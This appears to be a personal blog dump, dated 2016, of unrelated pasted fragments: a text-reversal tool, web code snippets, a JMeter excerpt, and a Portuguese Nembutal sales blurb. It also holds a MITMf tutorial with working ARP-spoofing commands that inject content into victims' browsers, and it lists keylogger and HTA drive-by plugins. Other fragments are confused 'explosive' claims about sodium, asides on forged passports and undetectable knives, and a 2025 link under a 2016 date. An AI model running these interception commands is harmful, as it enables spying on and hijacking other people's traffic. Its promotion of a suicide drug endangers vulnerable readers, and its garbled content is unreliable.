Thursday, December 1, 2016

Don't forget this..."Reverse Wording" will reverse the entire word order without reversing the word lettering." I know that the Jihad already sells the passports with holograms...however OVI, Micro Text, Guilloche, UV these combinations are use.

Enter your text to be reversed or unreversed here.
Test by click a reversing function button above to watch this text be reversed.
Click the same function button again to watch the reversed text be unreversed.
"Reverse Text" will reverse the entire text string.
"Flip Text" will reverse each text line. Useful for reversing a list of words.
"Reverse Wording" will reverse the entire word order without reversing the word lettering.
"Flip Wording" will reverse the word order of each text line.
"Reverse Each Word's Lettering" will reverse each word's lettering without changing the word order or punctuation.
"Upside Down" will create the illusion of an upside down page/text via string reversal and character substitution for letters a to z.
Privacy of Data: This tool is built-with and functions-in Client Side JavaScripting, so only your computer will see or process your data input/output.

Tool: Reverse Text Generator

       

Wednesday, November 30, 2016

Portuguese Army Commandos Convoy Ambush

but if you want get new url by ajax:
$(document).ready(function () {
    $('a').on('click', function (e) {
        var $this = $(this);
        $.ajax({
            url: 'GetUrl',
            async: false,
            success: function (url) {
                $this.attr("href", url);
                $this.attr("target", "_blank");
            },
            error: function () {
                e.preventDefault();
            }
        });
    })

})

PHP Include from Root


gets a little more complicated when dealing with a server side language like PHP. You can also do includes with PHP like this:
  1. <?php include("header.php"); ?>

Sunday, October 23, 2016

Man-In-The-Middle Attack Framework: MITMf

MITMf is a Framework for Man-In-The-Middle attacks. MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
MITMf is available with Kali Linux. It can also be installed on any flavour of linux. To install MITMf kindly follow the process available at https://github.com/byt3bl33d3r/MITMf/wiki/Installation
MITMf is a simple to use command line attack tool. This article presents some example which can be a real fun ;). Use it at your own risk.

Inject html page in victims browser

Create a index.html in your root folder and ...
root@debian:~# cd /usr/share/mitmf/  
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --inject --html-file /root/index.html  
The above example will injects this index.html in the victims(192.168.1.9 in this example) browser whenever he is viewing some http(not https) website.
  • -i is for the interface (wlan0 in this example)
  • --spoof Loads plugin 'Spoof'
  • --arp Redirect traffic using ARP spoofing
  • --gateway GATEWAYSpecify the gateway IP on your network.
  • --targets TARGETS Specify host/s to poison [if ommited will default to subnet]
  • --inject Load plugin 'Inject' to inject index.html
Note: arp spoof attack intercepts the traffic between the gateway (or router) and the target (192.168.1.9). All traffic thats going from victim to gateway now goes through the attackers system.

Make images look upside-down

This is real fun. Whatever http websites the victim is viewing, all images appearing on the pages will be flipped to 180 degrees.
root@debian:/usr/share/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.8.1 --target 192.168.8.100 --upsidedownternet

Replace images (Image Randomiser)

Image randomiser MITMf plugin replaces images in the victims browsers with a random one from a specified directory (/root/Pictures/ in this example).
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --imgrand --img-dir /root/Pictures/  

Other Plugins

There are many other plugins available with MITMf you can play with.
  • To take a screenshot of victims browser
ScreenShotter:  
Uses HTML5 Canvas to render an accurate screenshot of a clients browser

--screen Load plugin 'ScreenShotter'
--interval SECONDS Interval at which screenshots will be taken (default 10 seconds)
  • Injects a javascript keylogger into victims webpages
--jskeylogger Load plugin 'JSKeylogger'
  • Performs HTA drive-by attacks on victim
--hta Load plugin 'HTA Drive-By'
--text TEXT Text to display on notification bar
--hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta] 
 
http://www.googlinux.com/man-in-the-middle-attack-framework-mitmf/ 

Wednesday, October 19, 2016

lets go again for chemestry and explosives " sodium metal is not an oxidizer but it will react violently with water including the moisture in the air producing the highly flammable hydrogen gas. The oxidizer in this situation is the oxygen in the air. This chemical when stored should not be in contact with air or water." what's news then? for any person used to talk about bombs...is that sodium metal is a medication.

here it is a great explosive.and i know what im' talking about...sodium metal with water " twice a week, remove the metal canister from the plastic mouthpiece. Wash the mouthpiece in warm water and dry thoroughly before replacing the metal canister. Never immerse the metal canister in water.
STORAGE: Store between 15 to 30°C (59 to 86°F). Contents under pressure. Do not puncture, incinerate, or place near sources of heat. Exposure to temperatures above 120°F may cause bursting. Keep out of the reach of children. Avoid spraying in eyes

 INTAL® INHALER
(cromolyn sodium inhalation aerosol)
http://www.rxlist.com/intal-drug/medication-guide.htm 

undetectable knives ---jaws and stones




Friday, October 14, 2016

Jun. 9th, 2015

Using IP Spoofing to Simulate Requests from Different IP Addresses with JMeter

It’s not easy today to find a single node system as both failover and resilience are key points of modern applications. So if you need to load test a system, it will likely be something clustered.

The idea of a cluster is to protect the application from failure. If one node goes out of order, the remaining ones will continue to serve incoming requests. Usually hardware or software load balancers act as a single entry point, orchestrating all the incoming requests and sending them to the appropriate backend servers.

We have already covered the situation when the load balancer has more than one IP address and we know how to configure JMeter to hit all the load balancer endpoints. If it is something you missed you’re very welcome to read The DNS Cache Manager: The Right Way To Test Load Balanced Apps guide. 

The Challenge of Stickiness

One of the main features of load balancers is “stickiness” or “persistence” - a mechanism of wiring a client to one backend node behind the load balancer so requests could go back and forth. For example, if the application uses cookie-based authentication and the user has logged into one of the backend nodes, he will be authenticated there only for the amount of time required to replicate the session cache (which may be not immediate). This is one reason for stickiness.

Increase image

As simulated by JMeter the request goes via the Load Balancer, hits Server A and gets a Cookie. If the following request will go to the Server B it will not be authenticated as for the moment only Server A knows about this user and accepts its Cookie unless local caches are replicated into a Shared Cache.

https://www.blazemeter.com/blog/using-ip-spoofing-simulate-requests-different-ip-addresses-jmeter 

Thursday, October 13, 2016

Venda de Nembutal

Os benefícios do Nembutal
O medicamento Nembutal não serve apenas para eutanásia (suicídio), atua também como um poderoso calmante barbitúrico, capaz de aliviar dores e até mesmo colocar uma pessoa para dormir por até 16 horas, isto mesmo, 16 horas ininterruptamente...



Portugal Ukraine Russia (mercenaires killed)

  https://sicnoticias.pt/especiais/guerra-russia-ucrania/2025-04-03-video-russia-diz-ter-abatido-mercenarios-portugueses-na-ucrania-755f2fec